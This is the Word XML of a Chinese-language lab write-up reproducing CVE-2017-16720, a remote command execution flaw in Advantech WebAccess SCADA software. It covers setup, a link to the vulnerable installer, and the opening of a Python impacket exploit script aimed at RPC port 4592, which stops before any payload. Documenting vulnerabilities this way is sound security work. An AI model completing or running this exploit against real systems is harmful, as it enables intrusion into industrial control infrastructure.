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F487" w14:textId="77777777" w:rsidR="0078712B" w:rsidRDefault="0078712B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4488AD88" w14:textId="77777777" w:rsidR="0078712B" w:rsidRDefault="0078712B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A760B54" w14:textId="77777777" w:rsidR="0078712B" w:rsidRDefault="0078712B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EDD6C6A" w14:textId="281480E6" w:rsidR="00DA3126" w:rsidRDefault="00DA3126" w:rsidP="002D0B2A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋"/>
          <w:color w:val="222226"/>
          <w:kern w:val="44"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA3126">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋" w:hint="eastAsia"/>
          <w:color w:val="222226"/>
          <w:kern w:val="44"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CVE-2017-16720</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCC90C2" w14:textId="77777777" w:rsidR="00DA3126" w:rsidRDefault="00DA3126" w:rsidP="002D0B2A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋"/>
          <w:color w:val="222226"/>
          <w:kern w:val="44"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA3126">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋" w:hint="eastAsia"/>
          <w:color w:val="222226"/>
          <w:kern w:val="44"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>WebAccess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C358DE9" w14:textId="2F94DC1A" w:rsidR="002D0B2A" w:rsidRDefault="00DA3126" w:rsidP="002D0B2A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋"/>
          <w:color w:val="222226"/>
          <w:kern w:val="44"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA3126">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋" w:hint="eastAsia"/>
          <w:color w:val="222226"/>
          <w:kern w:val="44"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>远程命令执行漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1AD61B" w14:textId="1B656738" w:rsidR="0078712B" w:rsidRDefault="006C2EA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="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:id w:val="147465128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Cs w:val="44"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="0F9492DE" w14:textId="77777777" w:rsidR="0078712B" w:rsidRDefault="006C2EAA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1D305F2" w14:textId="1ACC750C" w:rsidR="0078712B" w:rsidRDefault="006C2EAA">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pP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TOC \o "1-3" \h \u </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:sz w:val="44"/>
              <w:szCs w:val="44"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc27475" w:history="1">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">1. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>漏洞描述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_Toc27475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E77A9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797F0B4" w14:textId="2C47948A" w:rsidR="0078712B" w:rsidRDefault="006848AD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25949" w:history="1">
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">2. </w:t>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>影响版本</w:t>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc25949 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="009E77A9">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0AF9F06D" w14:textId="3883B374" w:rsidR="0078712B" w:rsidRDefault="006848AD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5232" w:history="1">
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">3. </w:t>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>环境部署</w:t>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc5232 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="009E77A9">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="31894091" w14:textId="02224913" w:rsidR="0078712B" w:rsidRDefault="006848AD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11219" w:history="1">
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">4. </w:t>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>漏洞复现</w:t>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc11219 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="009E77A9">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="797ED2A3" w14:textId="77777777" w:rsidR="0078712B" w:rsidRDefault="006C2EAA">
          <w:pPr>
            <w:rPr>
              <w:sz w:val="44"/>
              <w:szCs w:val="44"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:szCs w:val="44"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="1163C0DC" w14:textId="77777777" w:rsidR="0078712B" w:rsidRDefault="006C2EAA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEA8553" w14:textId="77777777" w:rsidR="0078712B" w:rsidRDefault="0078712B"/>
    <w:p w14:paraId="52098CFB" w14:textId="3F0D8041" w:rsidR="0078712B" w:rsidRDefault="006C2EAA">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc27475"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞描述</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="5E20B882" w14:textId="5EDC1FD3" w:rsidR="00E72F81" w:rsidRPr="00E72F81" w:rsidRDefault="00E72F81" w:rsidP="00E72F81">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="640"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋"/>
          <w:bCs/>
          <w:kern w:val="44"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc25949"/>
      <w:r w:rsidRPr="00E72F81">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋" w:hint="eastAsia"/>
          <w:bCs/>
          <w:kern w:val="44"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>研华WebAccess是全世界第一套全浏览器架构的HMI/SCADA组态软件，可以无缝整合研华工业自动化事业群的产品，主要分为智能基础建设与智能制造两大类，这两类产品也同时组成了研华在智能自动化的物联网架构，而研华WebAccess正是这个物联网架构的核心。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1FA966" w14:textId="7493A2DE" w:rsidR="00E72F81" w:rsidRPr="00E72F81" w:rsidRDefault="00E72F81" w:rsidP="00E72F81">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="640"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋"/>
          <w:bCs/>
          <w:kern w:val="44"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72F81">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋" w:hint="eastAsia"/>
          <w:bCs/>
          <w:kern w:val="44"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>此漏洞允许攻击者使用RPC协议通过TCP端口4592执行远程命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52041AA6" w14:textId="5E4BE573" w:rsidR="0078712B" w:rsidRDefault="006C2EAA" w:rsidP="004C1793">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>影响版本</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="384857BD" w14:textId="103C8EE1" w:rsidR="00E72F81" w:rsidRPr="002D0B2A" w:rsidRDefault="00E72F81" w:rsidP="002D0B2A">
      <w:r w:rsidRPr="00E72F81">
        <w:t>WebAccess</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:t>= 8.3.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027F2E2C" w14:textId="52057EB4" w:rsidR="0078712B" w:rsidRDefault="006C2EAA">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc5232"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境部署</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="641AF59F" w14:textId="312EF690" w:rsidR="0078712B" w:rsidRDefault="006C2EAA">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLine="480"/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靶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机：</w:t>
      </w:r>
      <w:r w:rsidR="00131DA4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="00131DA4"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 </w:t>
      </w:r>
      <w:r w:rsidR="00E72F81">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>10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，ip：</w:t>
      </w:r>
      <w:r w:rsidR="00131DA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>172.16.</w:t>
      </w:r>
      <w:r w:rsidR="007801B9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>6.95</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794DB1F9" w14:textId="23CA0432" w:rsidR="0078712B" w:rsidRDefault="006C2EAA">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLine="480"/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渗透机：</w:t>
      </w:r>
      <w:r w:rsidR="00705A99">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="00E33B3D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>10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，ip：</w:t>
      </w:r>
      <w:r w:rsidR="00131DA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>172.16.</w:t>
      </w:r>
      <w:r w:rsidR="007801B9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>6.95</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A5E847" w14:textId="7421BBD6" w:rsidR="00705A99" w:rsidRDefault="00705A99">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLine="48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</w:p>
    <w:p w14:paraId="4D2FF3C2" w14:textId="2CAE269A" w:rsidR="0025100D" w:rsidRDefault="0025100D">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLine="48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  <w:t>下载含有漏洞的软件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300BBB69" w14:textId="3A9FD1E7" w:rsidR="007801B9" w:rsidRDefault="006848AD" w:rsidP="007801B9">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLine="56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hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="007801B9" w:rsidRPr="00EB6433">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>http://advcloudfiles.advantech.com/web/Download/webaccess/8.2/AdvantechWebAccessUSANode8.2_20170817.exe</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="28E2FA68" w14:textId="167B8008" w:rsidR="007801B9" w:rsidRDefault="007801B9">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLine="560"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AEB6CD4" wp14:editId="54BAC427">
            <wp:extent cx="4961905" cy="287619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BC4D" w14:textId="37FCAC71" w:rsidR="002D0B2A" w:rsidRPr="002D0B2A" w:rsidRDefault="002D0B2A">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLine="48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</w:p>
    <w:p w14:paraId="7F188068" w14:textId="116F7C34" w:rsidR="0025100D" w:rsidRDefault="007801B9">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLine="48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  <w:lastRenderedPageBreak/>
        <w:t>开始安装</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFC90BB" w14:textId="150A536A" w:rsidR="007801B9" w:rsidRDefault="007801B9">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLine="56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40DD916F" wp14:editId="0F21135D">
            <wp:extent cx="4838095" cy="37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BCFC" w14:textId="1ADEC5B1" w:rsidR="007801B9" w:rsidRDefault="002D61F7">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLine="56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59BACE36" wp14:editId="5702A0C7">
            <wp:extent cx="5274310" cy="39770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D125" w14:textId="459F8964" w:rsidR="002D61F7" w:rsidRDefault="002D61F7">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLine="56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A7AEB9" wp14:editId="2DFC0DB0">
            <wp:extent cx="5274310" cy="40055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A79C" w14:textId="323CBA66" w:rsidR="002D61F7" w:rsidRDefault="002D61F7">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLine="56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5EC7BC63" wp14:editId="2F92F9EF">
            <wp:extent cx="3095238" cy="113333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801F" w14:textId="4DF76BA6" w:rsidR="009A6E42" w:rsidRDefault="002D61F7" w:rsidP="009A6E42">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLine="48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 w:rsidRPr="002D61F7"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  <w:t>安装一律默认</w:t>
      </w:r>
      <w:r w:rsidRPr="002D61F7"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  <w:t>NEXT</w:t>
      </w:r>
      <w:r w:rsidRPr="002D61F7"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  <w:t>即可，</w:t>
      </w:r>
      <w:r w:rsidRPr="002D61F7"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  <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidRPr="002D61F7"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  <w:t>端口也无需自定义，默认程序端口</w:t>
      </w:r>
      <w:r w:rsidRPr="002D61F7"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  <w:t>4592</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E98BA9" w14:textId="77777777" w:rsidR="002D61F7" w:rsidRPr="003A78D9" w:rsidRDefault="002D61F7" w:rsidP="009A6E42">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLine="48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</w:p>
    <w:p w14:paraId="34B18CCD" w14:textId="72D00DF8" w:rsidR="0078712B" w:rsidRDefault="006C2EAA">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc11219"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="64063AED" w14:textId="78502D8E" w:rsidR="005B758B" w:rsidRDefault="006C2EAA" w:rsidP="004B4D38">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>【步骤一】</w:t>
      </w:r>
      <w:r w:rsidR="004B4D38">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:r w:rsidR="004B4D38">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r w:rsidR="004B4D38">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F08DC2" w14:textId="7D9E0CF5" w:rsidR="004B4D38" w:rsidRDefault="006848AD" w:rsidP="004B4D38">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidR="004B4D38" w:rsidRPr="00EB6433">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>h</w:t>
        </w:r>
        <w:r w:rsidR="004B4D38" w:rsidRPr="00EB6433">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>ttps://python.org/download/releases/2.7</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1AE6CE05" w14:textId="5A7405F6" w:rsidR="004B4D38" w:rsidRDefault="004B4D38" w:rsidP="004B4D38">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind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60185A3" wp14:editId="51FC6323">
            <wp:extent cx="5274310" cy="34283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9CD0" w14:textId="75B7057A" w:rsidR="004B4D38" w:rsidRDefault="004B4D38" w:rsidP="004B4D38">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind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69A00C8" wp14:editId="2D1CBCD8">
            <wp:extent cx="4019048" cy="187619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1FBF" w14:textId="77777777" w:rsidR="004B4D38" w:rsidRPr="004B4D38" w:rsidRDefault="004B4D38" w:rsidP="004B4D38">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E5FA675" w14:textId="77777777" w:rsidR="00627A6A" w:rsidRDefault="00627A6A" w:rsidP="00E33399">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19A160D0" w14:textId="5BBDFCBD" w:rsidR="0078712B" w:rsidRDefault="006C2EAA">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>【步骤二】</w:t>
      </w:r>
      <w:r w:rsidR="004B4D38">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>创建</w:t>
      </w:r>
      <w:r w:rsidR="004B4D38">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>EXP</w:t>
      </w:r>
      <w:r w:rsidR="004B4D38">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>脚本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D38" w14:paraId="4D28593C" w14:textId="77777777" w:rsidTr="004B4D38">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50A0796C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#!/usr/bin/python2.7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="375EF7C8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</w:p>
          <w:p w14:paraId="51547B70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import sys, struct</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="311051FA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from impacket import uuid</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A25B8F0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from impacket.dcerpc.v5 import transport</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7434B636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</w:p>
          <w:p w14:paraId="253F2C75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def call(dce, opcode, stubdata):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03993B48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lastRenderedPageBreak/>
              <w:t xml:space="preserve">  dce.call(opcode, stubdata)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2883E42B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 xml:space="preserve">  res = -1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66D50323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 xml:space="preserve">  try:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14E6346D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 xml:space="preserve">    res = dce.recv()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E7603DA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 xml:space="preserve">  except Exception, e:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="707E9C42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 xml:space="preserve">    print "Exception encountered..." + str(e)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="443D768E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 xml:space="preserve">    sys.exit(1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04F9F2B1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 xml:space="preserve">  return res</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03E02042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</w:p>
          <w:p w14:paraId="4842410B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if len(sys.argv) != 2:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30C61E43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 xml:space="preserve">  print "Provide only host arg"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B83ACF5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 xml:space="preserve">  sys.exit(1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="458F0AD2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</w:p>
          <w:p w14:paraId="1B9EEFA3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port = 4592</w:t>
            </w:r>
          </w:p>
